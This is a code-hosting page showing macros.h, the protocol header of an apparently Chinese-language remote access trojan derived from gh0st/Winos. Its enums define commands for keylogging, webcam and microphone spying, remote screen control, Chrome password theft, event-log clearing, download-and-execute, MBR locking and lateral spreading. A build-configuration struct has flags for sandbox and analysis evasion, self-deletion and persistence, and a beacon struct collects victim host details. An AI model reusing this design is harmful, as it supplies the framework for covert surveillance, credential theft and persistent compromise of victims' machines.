GuanM/Rat-winos4.0-gh0st
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Rat-winos4.0-gh0st/机器猫/common/macros.h
Logkiss a6a4b6368e rat
2024-06-23 17:36:53 +08:00

405 lines
14 KiB
C
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#if !defined(AFX_MACROS_H_INCLUDED)
#define AFX_MACROS_H_INCLUDED
#include <winsock2.h>
//////////////////////////////////////////////////////////////////////////
enum
{
// 文件传输方式
TRANSFER_MODE_NORMAL = 1, // 一般,如果本地或者远程已经有,取消
TRANSFER_MODE_ADDITION, // 追加
TRANSFER_MODE_ADDITION_ALL, // 全部追加
TRANSFER_MODE_OVERWRITE, // 覆盖
TRANSFER_MODE_OVERWRITE_ALL, // 全部覆盖
TRANSFER_MODE_JUMP, // 覆盖
TRANSFER_MODE_JUMP_ALL, // 全部覆盖
TRANSFER_MODE_CANCEL, // 取消传送
};
enum
{
COMMAND_LIST_FILES = 1, // 列出目录中的文件
COMMAND_DOWN_FILES, // 下载文件
COMMAND_FILE_SIZE, // 上传时的文件大小
COMMAND_FILE_DATA, // 上传时的文件数据
COMMAND_CONTINUE, // 传输正常,请求继续发送数据
COMMAND_STOP, // 传输中止
COMMAND_DELETE_FILE, // 删除文件
COMMAND_DELETE_DIRECTORY, // 删除目录
COMMAND_SET_TRANSFER_MODE, // 设置传输方式
COMMAND_CREATE_FOLDER, // 创建文件夹
COMMAND_RENAME_FILE, // 文件或文件改名
COMMAND_OPEN_FILE_SHOW, // 显示打开文件
COMMAND_OPEN_FILE_HIDE, // 隐藏打开文件
COMMAND_FILES_SEARCH_START, // 搜索文件
COMMAND_FILES_SEARCH_STOP, // 停止搜索
COMMAND_MOVE_DIRECTORY, // 移动文件夹
COMMAND_MOVE_FILE, // 移动文件
TOKEN_FILE_LIST, // 文件列表
TOKEN_FILE_SIZE, // 文件大小,传输文件时用
TOKEN_FILE_DATA, // 文件数据
TOKEN_TRANSFER_FINISH, // 传输完毕
TOKEN_DELETE_FINISH, // 删除完毕
TOKEN_GET_TRANSFER_MODE, // 得到文件传输方式
TOKEN_GET_FILEDATA, // 远程得到本地文件数据
TOKEN_CREATEFOLDER_FINISH, // 创建文件夹任务完成
TOKEN_DATA_CONTINUE, // 继续传输数据
TOKEN_RENAME_FINISH, // 改名操作完成
TOKEN_SEARCH_FILE_LIST, // 搜索出来的文件
TOKEN_SEARCH_FILE_FINISH, // 全部搜索完成
TOKEN_MOVE_FINISH,
TOKEN_COMPRESS_FINISH,
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_SCREEN_RESET = 1, // 改变屏幕深度
COMMAND_AERO_DISABLE, // 禁用桌面合成(Aero)
COMMAND_AERO_ENABLE, // 启用桌面合成(Aero)
COMMAND_ALGORITHM_RESET, // 改变算法
COMMAND_SCREEN_CTRL_ALT_DEL, // 发送Ctrl+Alt+Del
COMMAND_SCREEN_CONTROL, // 屏幕控制
COMMAND_SCREEN_BLOCK_INPUT, // 锁定服务端键盘鼠标输入
COMMAND_SCREEN_BLANK, // 服务端黑屏
COMMAND_SCREEN_CAPTURE_LAYER, // 捕捉层
COMMAND_SCREEN_GET_CLIPBOARD, // 获取远程剪贴版
COMMAND_SCREEN_SET_CLIPBOARD, // 设置远程剪帖版
TOKEN_FIRSTSCREEN, // 屏幕查看的第一张图
TOKEN_NEXTSCREEN, // 屏幕查看的下一张图
TOKEN_CLIPBOARD_TEXT, // 屏幕查看时发送剪帖版内容
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_PSLIST = 1, // 进程列表
COMMAND_WSLIST, // 窗口列表
COMMAND_SSLIST, // 用户信息
COMMAND_USLIST, // 系统用户
COMMAND_ASLIST, // 用户状态
COMMAND_DSLIST, // 拨号密码
COMMAND_SOFTWARELIST, // 软件列表
COMMAND_KILLPROCESS, // 关闭进程
COMMAND_KILLPROCESS_WINDOW, // 关闭进程(窗口)
COMMAND_WINDOW_TEST, // 窗口隐藏、还原、最大化、最小化
COMMAND_WINDOW_CLOSE, // 窗口关闭
COMMAND_ACITVEUSER, // 启用用户
COMMAND_DISABLEEUSER, // 禁用用户
COMMAND_NET_USER, // 无net添加用户
COMMAND_CHANGE_USERPASS, // 更改用户密码
COMMAND_DELUSER, // 删除用户
COMMAND_DISCONNECTUSER, // 断开用户
COMMAND_LOGOFF_USER, // 注销用户
COMMAND_3389_PORT, // 更改3389端口
COMMAND_OPEN_3389, // 开启3389
COMMAND_SEND_TERMSRV, // 发送双开3389文件
COMMAND_S_SESSION, // 会话管理
COMMAND_IHLIST, // IE 历史记录
COMMAND_FULIST, //IE收藏夹
COMMAND_NSLIST, //网络连接状态
COMMAND_APPUNINSTALL, //程序卸载
COMMAND_NETWORK, //网卡MAC地址
COMMAND_HOSTS, //Host文件
COMMAND_RUN, //启动项
COMMAND_PROCESSFREEZING, //进程解冻
COMMAND_PROCESSTHAWING, //进程冻结
//
TOKEN_WSLIST, // 窗口列表
TOKEN_SSLIST, // 系统信息
TOKEN_USLIST, // 系统用户
TOKEN_ASLIST, // 用户状态
TOKEN_DIALUPASS, // 拨号密码
TOKEN_SOFTWARE, // 软件信息
TOKEN_CPUMEMORY, // cpu 内存使用率
TOKEN_CHANGE_PSAA_SUCCESS, // 更改用户密码成功
TOKEN_GET_TERMSRV, // XP系统获取双开3389文件
TOKEN_TERMSRV_OK, // 双开3389成功
TOKEN_IHLIST, // IE历史记录
TOKEN_FULIST, //IE收藏夹
TOKEN_NSLIST, //网络连接状态
TOKEN_HOSTS, //Host文件
TOKEN_NETWORK, //网卡MAC
TOKEN_RUN, //启动项
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_WEBCAM_RESIZE = 1, // 摄像头调整分辩率后面跟两个INT型的宽高
TOKEN_WEBCAM_DIB, // 摄像头的图像数据
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_DELETESERVERICE = 100, // 删除服务
COMMAND_STARTSERVERICE, // 启动服务
COMMAND_STOPSERVERICE, // 停止服务
COMMAND_PAUSESERVERICE, // 暂停服务
COMMAND_CONTINUESERVERICE, // 继续服务
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_REG_ENUM = 1, // 枚举注册表
COMMAND_REG_CREATEKEY, // 创建路径
COMMAND_REG_DELKEY, // 删除路径
COMMAND_REG_CREATKEY, // 创建键
COMMAND_REG_DELVAL, // 删除键
TOKEN_REG_INFO, // 注册表信息
TOKEN_REG_SUCCEED, // 注册表成功
TOKEN_REG_ERROR, // 注册表出错
TOKEN_REG_KEY, // 键值数据
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_AUDIO_DATE = 1, // 发送本地语音数据
COMMAND_AUDIO_CHANGER, // 更改输入设备
COMMAND_AUDIO_CHANGER_LINES, // 更换输入声道
TOKEN_AUDIO_DATA, // 音频数据
TOKEN_AUDIO_CHANGE_FINISH, // 换道成功
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_KEYBOARD_OFFLINE = 1, // 开启离线键盘记录
COMMAND_SEND_KEYBOARD, // 获取键盘记录内容
COMMAND_KEYBOARD_CLEAR, // 清除键盘记录内容
COMMAND_EXCEPTION, // 传输发生异常,需要重新传输
TOKEN_KEYBOARD_DATA, // 键盘记录的数据
COMMAND_KEYBOARD_OLKEYLOG, // 在线记录
COMMAND_KEYBOARD_OLKEYLOG_OFF, // 关闭在线记录
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
CLEAN_EVENT_ALL = 1, //清理日志
};
//////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////
enum
{
COMMAND_PROXY_CONNECT= 1, //socket5代理
COMMAND_PROXY_CLOSE,
COMMAND_PROXY_DATA,
TOKEN_PROXY_CONNECT_RESULT,
TOKEN_PROXY_CLOSE,
TOKEN_PROXY_DATA,
TOKEN_PROXY_BIND_RESULT
};
//////////////////////////////////////////////////////////////////////////
enum
{
// 控制端发出的命令
COMMAND_SESSION = 0, // 会话管理(关机,重启,注销, 卸载)
COMMAND_UNINSTALL, // 卸载
COMMAND_RENAME_REMARK, // 更改备注
COMMAND_CHANGE_GROUP, // 更改分组
COMMAND_CLEAN_EVENT, // 清理日志
// 其他功能
COMMAND_DOWN_EXEC, // 下载执行
COMMAND_DOWN_UPDATE, // 下载更新
COMMAND_START, //写入启动
COMMAND_OPEN_URL_SHOW, // 打开网页(显示)
COMMAND_OPEN_URL_HIDE, // 打开网页(隐藏)
COMMAND_LOCAL_UPLOAD, // 本地上传
COMMAND_LOCAL_UPLOAD1, // UAC
COMMAND_LOCAL_UPLOAD2, // UAC2
COMMAND_MESSAGEBOX, // Messagebox
// 筛选
COMMAND_FIND_PROCESS, // 查找进程
COMMAND_FIND_WINDOW, // 查找窗口
COMMAND_OPEN_PROXY, // 开启代理
COMMAND_CLOSE_PROXY, // 关闭代理
COMMAND_PRANK, // 恶 作 剧
// 主要功能
COMMAND_NEXT = 100, // 下一步(控制端已经打开对话框)
COMMAND_LIST_DRIVE, // 文件管理(列出磁盘目录)
COMMAND_SCREEN_SPY, // 屏幕监控
COMMAND_WEBCAM, // 摄像头监控
COMMAND_AUDIO, // 语音监听
COMMAND_SHELL, // cmdshell
COMMAND_SYSTEM, // 系统管理
COMMAND_KEYBOARD, // 键盘记录
COMMAND_SERVICE_MANAGER, // 服务管理
COMMAND_REGEDIT, // 注 册 表
COMMAND_TEXT_CHAT, // 文字聊天
COMMAND_PROXY_MAP, // proxy
COMMAND_NEXT1, // 下一步(控制端已
COMMAND_SCREEN_SPY1, // 屏幕查看
COMMAND_SCREEN_RESET1,
COMMAND_ALGORITHM_RESET1,
COMMAND_WIN7BASIC1,
COMMAND_SCREEN_CTRL_ALT_DEL1,
COMMAND_SCREEN_BLOCK_INPUT1,
COMMAND_SCREEN_BLANK1,
COMMAND_SCREEN_CAPTURE_LAYER1,
COMMAND_SCREEN_GET_CLIPBOARD1,
COMMAND_SCREEN_CONTROL1,
COMMAND_SCREEN_SET_CLIPBOARD1,
//娱乐
COMMAND_PRANK_CONTROL,
COMMAND_KILLMBR, // 硬盘锁
COMMAND_GUANGQU1, // 打开光驱
COMMAND_GUANGQU2, // 收回光驱
COMMAND_ZHUOMIAN1, // 桌面隐藏
COMMAND_ZHUOMIAN2, // 显示隐藏
COMMAND_ZAOYIN, // 噪音
COMMAND_SHANPIN, // 闪屏
COMMAND_XIANSHIQI1, // 关闭显示器
COMMAND_XIANSHIQI2, // 打开显示器
COMMAND_RENWULAN1, // 隐藏任务栏
COMMAND_RENWULAN2, // 显示任务栏
COMMAND_MOUSE1, // 鼠标左右互换
COMMAND_MOUSE2, // 鼠标互换关闭
// 预留
COMMAND_CHAT, //剪切板
COMMAND_CHAT_CLOSE,
COMMAND_Screen,
COMMAND_FILEATTR, //文件属性
COMMAND_OnElevate_Privileges, //WIN7提升权限
COMMAND_CHROME_INFO, //查找GOOGLE浏览器账号密码
COMMAND_ReStart_Exp, //重启Exp
COMMAND_ReStart_ieqc, //重启Exp
COMMAND_ReStart_ieqc1, //重启Exp
COMMAND_ReStart_ieqc2, //重启Exp
COMMAND_ReStart_ieqc3, //重启Exp
COMMAND_ReStart_ieqc4, //重启Exp
COMMAND_ReStart_ieqc5, //重启Exp
COMMAND_ReStart_ieqc6, //重启Exp
COMMAND_ReStart_ieqc7, //重启Exp
COMMAND_ReStart_ieqc8, //重启Exp
COMMAND_ReStart_ieqc9, //重启Exp
COMMAND_PLUGINME,
COMMAND_NWCB, //内网传播
/////////////////////////////////////////////////////////////////////////////////////////
// 服务端发出的标识
TOKEN_LOGIN = 200, // 上线包
TOKEN_DRIVE_LIST, // 文件管理(驱动器列表)
TOKEN_BITMAPINFO, // 屏幕监控屏幕查看的BITMAPINFO
TOKEN_WEBCAM_BITMAPINFO, // 摄像头摄像头的BITMAPINFOHEADER
TOKEN_SHELL_START, // CMD
TOKEN_AUDIO_START, // 开始语音监听
TOKEN_PSLIST, // 进程列表
TOKEN_KEYBOARD_START, // 键盘记录开始
TOKEN_SERVICE_LIST, // 服务列表
TOKEN_REGEDIT, // 注册表开始
TOKEN_TEXTCHAT_START, // 文字聊天开始
TOKEN_PROXY_START, // 代理映射开始
// 其他
TOKEN_FIND_YES, // 查找存在
TOKEN_FILEATTR, // 文件属性
// 预留
TOKEN_CHROME_INFO, // 浏览器账号密码信息
TOKEN_CHAT_START, // 剪切板
TOKEN_BITMAPINFO1, // 屏幕查看的BITMAPINFO
TOKEN_FIRSTSCREEN1,
TOKEN_NEXTSCREEN1,
TOKEN_CLIPBOARD_TEXT1,
};
struct DLL_INFO
{
char LoginAddr[30]; // 上线地址 1
UINT LoginPort; // 上线端口 2
WORD FileAttribute; // 文件属性 3
char UpGroup[30]; // 上线分组 4
char ConnetPass[20]; // 通讯秘钥 5
TCHAR ReleaseName[25]; // 安装名称 6
char ServiceName[70]; // 服务名称 7
char ServiceDisplayName[70]; // 服务显示 8
char ServiceDescription[120];// 服务描述 9
char ReleasePath[100]; // 安装路径 10
CHAR szDownRun[150]; // 捆绑地址 11
char Dele_zc; // 启动类型 12
BOOL Fwb; // 微步 13
BOOL Fhb; // 哈勃 14
BOOL Fxn; // 虚拟 15
BOOL Ffx; // 分析 16
BOOL Fsc; // 防删 17
BOOL Fzs; // 自删 18
BOOL Fcf; // 重复 19
BOOL Ffh; // 复活 20
BOOL Fct; // 穿透 21
BOOL Fzj; // 终结 22
BOOL Fkb; // 捆绑 23
BOOL Fsm; // 睡眠 24
BOOL Flx; // 离线 25
BOOL Fwr; // 微软 26
};
typedef struct
{
BYTE bToken; // = 1
char UpGroup[30]; // 上线分组
IN_ADDR IPAddress; // 存储32位的IPv4的地址数据结构
char HostName[50]; // 主机名
OSVERSIONINFOEX OsVerInfoEx; // 版本信息
DWORD dwMajorVer; // 系统主版本
DWORD dwMinorVer; // 系统次版本
DWORD dwBuildNumber; // 系统Build版本
char CPUClockMhz[20];// CPU信息
DWORD dwSpeed; // 网速
UINT bIsWebCam; // 是否有摄像头
UINT Mining;
bool bIsWow64;
DWORD dwMemSize;
char szInstallTime[50]; //安装时间
char lpColor[20]; //颜色
char Virus[80]; // 杀毒软件
////////
char szGraphics[128]; //显卡
DWORD Memory7; //显存
char szQQNum[32]; // 登陆QQ
BOOL bIsActive; // 用户状态
char szLionPass[20]; //设置通讯秘钥
char Pattern[50]; // 运行模式
char Admin[64]; //拥有权限
/////////
}LOGININFO;
enum CHROME_MSG
{
CHROME_SUCCESS = 0,
CHROME_UNKNOW,
CHROME_KEY_NOTFOUND,//Key文件不存在
CHROME_DB_NOTFOUND,//chrome login data文件不存在
CHROME_OPENDB_FAILED,//login data打开失败可能没权限之类的
CHROME_NO_DATA,//库里面没数据
CHROME_DECODEKEY_FAILED,//密钥解密失败
};
#define MAX_WRITE_RETRY 15 // 重试写入文件次数
#define MAX_SEND_BUFFER 2048*50 // 最大发送数据长度(速度可达到50Mbps)
#define MAX_RECV_BUFFER 2048*50 // 最大接收数据长度(速度可达到50Mbps)
#endif // !defined(AFX_MACROS_H_INCLUDED)
Reference in New Issue View Git Blame Copy Permalink